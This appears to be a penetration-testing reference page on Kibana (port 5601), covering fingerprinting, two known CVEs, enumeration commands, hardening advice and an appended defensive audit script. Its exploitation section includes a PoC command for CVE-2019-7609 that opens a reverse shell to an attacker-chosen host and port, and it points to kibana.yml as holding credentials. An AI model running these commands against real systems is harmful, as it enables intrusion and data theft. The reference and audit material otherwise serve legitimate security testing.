Service bank
MONITORING 5601/tcp

Kibana

Elasticsearch's visualization front-end on 5601. Often unauthenticated; older versions carry prototype-pollution and LFI-to-RCE CVEs, and it's a direct window into all Elasticsearch data.

Ports

Port   Proto   Notes
5601   tcp     Kibana web UI

Fingerprint

  • 'Kibana' UI; /api/status returns the version
  • Usually paired with Elasticsearch on 9200

Key files

Path                     Holds                                  Sensitive
/etc/kibana/kibana.yml   elasticsearch creds, encryption keys   sensitive

Known CVEs

CVE              Impact
CVE-2019-7609    Timelion prototype pollution → RCE
CVE-2018-17246   Local File Inclusion via the Console plugin → RCE

Exploitation primitives

  • Unauthenticated UI → browse all Elasticsearch indices and Dev Tools
  • CVE-2019-7609: Timelion canvas payload spawns a reverse shell as the kibana user
  • CVE-2018-17246: LFI loads a planted JS file for RCE

Overview

Kibana on 5601 visualises Elasticsearch. Even a read-only instance exposes all indexed data through Dev Tools; older builds escalate to RCE.

Enumeration

Version:

curl -s http://<TARGET>:5601/api/status | jq .version.number

Query Elasticsearch through Kibana’s console (or directly on 9200):

curl http://<TARGET>:9200/_cat/indices?v

RCE (CVE-2019-7609, Timelion)

Start a listener, then submit the Timelion prototype-pollution payload (PoC automates the canvas request):

python3 CVE-2019-7609.py -u http://<TARGET>:5601 -host <YOUR_IP> -port 4444 --shell

Hardening

Enable authentication (X-Pack / OpenSearch Security), do not expose 5601 or 9200 to untrusted networks, and patch past 6.6.1.
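Added example (not part of this page) for auditing your own Kibana instances against the points above: it probes /api/status without credentials, parses version.number, and flags anything below the 6.6.1 threshold. The sample JSON body is constructed, and treating an anonymous HTTP 200 on /api/status as a sign that authentication is not enforced is an assumption stated in the code.

```python
"""Audit helper: flag Kibana instances that answer /api/status without
credentials or report a version below the 6.6.1 threshold from this page."""
import json
import re
import urllib.error
import urllib.request

PATCHED = (6, 6, 1)  # the page's "patch past 6.6.1"


def parse_version(text):
    """Extract version.number from a /api/status JSON body as an int tuple."""
    number = json.loads(text)["version"]["number"]
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", number)  # tolerates "-SNAPSHOT" suffixes
    if not m:
        raise ValueError("unrecognised version string: %r" % number)
    return tuple(int(x) for x in m.groups())


def needs_patch(version, fixed=PATCHED):
    """True when the running version is older than the fixed release."""
    return tuple(version) < tuple(fixed)


def assess(status_code, body):
    """Turn one /api/status response into findings.
    Assumption: an anonymous 200 means the status API is reachable
    without authentication, which should be reviewed."""
    findings = {"anonymous_status": status_code == 200,
                "version": None, "below_fix": None}
    if status_code == 200:
        v = parse_version(body)
        findings["version"] = ".".join(str(x) for x in v)
        findings["below_fix"] = needs_patch(v)
    return findings


def probe(base_url, timeout=5):
    """Request /api/status with no credentials and assess the answer."""
    url = base_url.rstrip("/") + "/api/status"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return assess(r.status, r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:  # e.g. 401 when auth is enforced
        return assess(e.code, "")


# Constructed sample body; not captured from any real host.
SAMPLE = json.dumps({"name": "kibana-01", "version": {"number": "6.5.4"}})

if __name__ == "__main__":
    print(assess(200, SAMPLE))  # flags version 6.5.4 as below the fix
```

Run `probe("http://<YOUR_KIBANA>:5601")` against each instance in your inventory and review any result with anonymous_status or below_fix set to True.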

References